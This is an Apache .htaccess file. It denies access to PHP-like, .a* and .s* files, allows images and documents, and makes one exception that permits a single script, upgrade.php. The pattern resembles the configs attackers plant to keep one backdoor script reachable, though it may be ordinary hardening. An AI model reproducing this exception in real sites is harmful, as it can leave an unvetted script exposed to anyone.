<Files *.a*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.pH*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.PH*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.Ph*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.ph*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.s*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.S*>
    Order Deny,Allow
    Deny from all
</Files>

<FilesMatch "\.(jpg|pdf|docx|jpeg|)$">
    Order Deny,Allow
    Allow from all
</FilesMatch>

<FilesMatch "^(upgrade.php)$"> 
 Order allow,deny
 Allow from all
</FilesMatch>

DirectoryIndex index.php index.html index.blade.php


Options -Indexes

